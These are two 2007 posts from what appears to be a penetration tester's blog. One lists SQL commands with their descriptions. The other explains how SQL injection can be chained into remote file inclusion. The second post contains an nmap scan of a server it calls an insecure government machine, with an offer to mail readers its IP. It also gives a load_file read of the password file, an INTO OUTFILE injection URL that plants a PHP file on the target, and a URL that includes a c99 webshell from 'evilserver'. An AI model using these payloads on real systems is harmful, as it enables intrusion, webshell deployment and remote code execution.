what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Tuesday, May 15, 2007

SQL COMMANDS, ALSO USED FOR COMPROMISE

Here is a list of SQL commands and what they do, these would be used in some injection methods and of course legitimate sql functions too
On theirr own they wont exploit anything but eventually you will find an exploit that needs these and they are good to know, for injection or just to better understand how SQL works.

ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database


/Chuks

Thursday, May 10, 2007

ANSWERING THE QUESTIONS ON SQLINJECTION AND BUILDING IN AN RFI SCRIPT IN HOUSE

These are on the comments and previews done, so i will try explain the way i can best about it.

They best way to defend it is to have port 3306 filtered.....(check that server, top goverment but one of the most insecure) mail me if u need the ip.

slax ~ # nmap -sS -P0 XXX.XXX.XXX.XXX

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-05-10 12:02 EAT

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
143/tcp closed imap
443/tcp open https
631/tcp closed ipp
3306/tcp open mysql
10000/tcp closed snet-sensor-mgmt


.........and have the latest Kernel patch in your Box. Aslong as an RFI bug may be in yah site, or lets say your CMS, a knowledgable hacker will still get thru, so even a strong password wouldn't be a big deal if he is browsing your server on Port 80. The only thing that really helped last year from these kind of attacks was to have yah php safe_mode ON (secure) but these days there are so many ways of bypassing it, Lol!

This was well shown after the month of PHP bugs, January and Feb this year after the release of alot of POCs to the public by Hardened PHP and other communities.

To all, the best way to secure yah BOX, is to know how an intruder will get thru, by doing all types of Pentest Attacks, whether Black Box or White Box penetration testing.

Something else, before i go, SQL INJECTION, can help an attacker to build up an RFI attack on a server, by tring an injection where he is able to browse files: load_file('etc/password') and create his RFI by crafting an injection like:

www.site.com/vulnerablescripts.php?id=-1+union+select
+',1,2,3,4+from+mysql.user/**/into/**/outfile/**/'/home
/www/public/http/vul.php'/*

So we will have another file in the server named vul.php, which will have a straight rfi bug.

So remote include with a c99shell,or c100, r57 and other privated moded webshells.

www.site.com/vul.php?cmd=http://evilserver/c99.txt

Just a simple one, though there are more complex ones that needs alot experience.

Tried to explain in Example.

/Chuks